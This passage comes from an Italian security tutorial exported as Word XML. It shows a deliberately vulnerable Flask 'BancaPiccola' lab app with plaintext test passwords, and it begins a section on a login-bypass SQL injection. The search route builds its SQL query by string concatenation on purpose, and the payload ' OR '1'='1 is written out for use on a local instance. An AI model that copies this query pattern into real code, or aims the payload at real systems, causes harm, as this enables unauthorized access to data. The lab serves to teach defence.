        <w:t xml:space="preserve">        &lt;p style="color:gray"&gt;Utenti di test in chiaro nel lab: </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        mario/mario123, giulia/giulia2025, luca/passwordLuca!, admin/Sup3rS3gret0!&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># DASHBOARD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/dashboard"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> dashboard():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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;h1&gt;Dashboard&lt;/h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;p&gt;Sei autenticato come: &lt;b&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'username'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/b&gt;&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;p&gt;Ruolo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'ruolo'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;p&gt;&lt;a href="/logout"&gt;Esci&lt;/a&gt; | &lt;a href="/"&gt;Home&lt;/a&gt;&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># RICERCA PRODOTTI — VULNERABILE A SQL INJECTION (UNION-based)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/cerca"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cerca():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    q </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.args.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"q"</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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ VULNERABILE: input concatenato nella query</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"SELECT nome, descrizione FROM prodotti WHERE nome LIKE '%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialString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f"[DEBUG] Query eseguita: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        cur.execute(query)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        risultati </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.fetchall()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">except</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlite3.Error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f"&lt;h2&gt;Errore nel database:&lt;/h2&gt;&lt;pre&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/pre&gt;"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">finally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        conn.close()</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&lt;h2&gt;Risultati per "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> q </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;/h2&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;a href="/"&gt;⬅ torna alla home&lt;/a&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;table border="1" cellpadding="6" style="margin-top:10px"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;tr&gt;&lt;th&gt;Nome&lt;/th&gt;&lt;th&gt;Descrizione&lt;/th&gt;&lt;/tr&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">or r in risultati %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;tr&gt;&lt;td&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> r[0] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/td&gt;&lt;td&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> r[1] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/td&gt;&lt;/tr&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lse %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;tr&gt;&lt;td colspan="2"&gt;Nessun risultato.&lt;/td&gt;&lt;/tr&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ndfor %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/table&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">q, risultati</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">risultati)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># LOGOUT</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/logout"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> logout():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    session.clear()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redirect(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Avvio</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init_db()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    app.run(debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Salva ed esegui:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python app.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri il browser su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Vedi la pagina della</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Esplora:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Clicca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Accedi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, entra con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario / mario123</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Vedi la dashboard. Esci.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Dalla home, cerca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">conto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nella casella di ricerca. Vedi i risultati.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Funziona, all’apparenza è una banale app web.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">In realtà ha due vulnerabilità SQL Injection che vedremo all’opera nelle prossime due sezioni.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Nota didattica.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ho lasciato due</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">print(f"[DEBUG] Query eseguita: ...")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel codice. Quando lanci gli attacchi,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">guarda anche il terminale dove gira Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: vedrai stampata la query SQL effettivamente costruita ed eseguita. È il modo migliore per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vedere con i tuoi occhi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cosa succede.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="210"/>
    <w:bookmarkEnd w:id="211"/>
    <w:bookmarkStart w:id="216" w:name="primo-attacco-login-bypass-con-or-11"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="500" w:name="sec_5_5"/>
      <w:r>
        <w:t xml:space="preserve">5.5 Primo attacco: login bypass con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="500"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mantieni l’app in esecuzione e vai sulla pagina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="212" w:name="lattacco"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’attacco</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">scrivi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
